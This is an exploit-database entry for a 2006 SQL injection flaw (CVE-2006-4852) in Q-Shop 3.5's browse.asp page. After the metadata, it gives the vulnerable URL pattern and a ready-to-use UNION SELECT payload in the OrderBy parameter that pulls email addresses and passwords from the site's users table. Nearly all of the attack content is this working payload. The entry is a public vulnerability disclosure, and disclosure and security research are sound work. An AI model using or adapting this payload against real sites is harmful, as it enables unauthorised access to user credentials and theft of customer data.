Q-Shop 3.5 - 'browse.asp' SQL Injection
Author: ajann
type: webapps
platform: asp
port:
date_added: 2006-09-16
date_updated:
verified: 1
codes: OSVDB-28917;CVE-2006-4852
tags:
aliases:
screenshot_url:
application_url:
Vulnerability Report
*******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
# milw0rm.com [2006-09-17]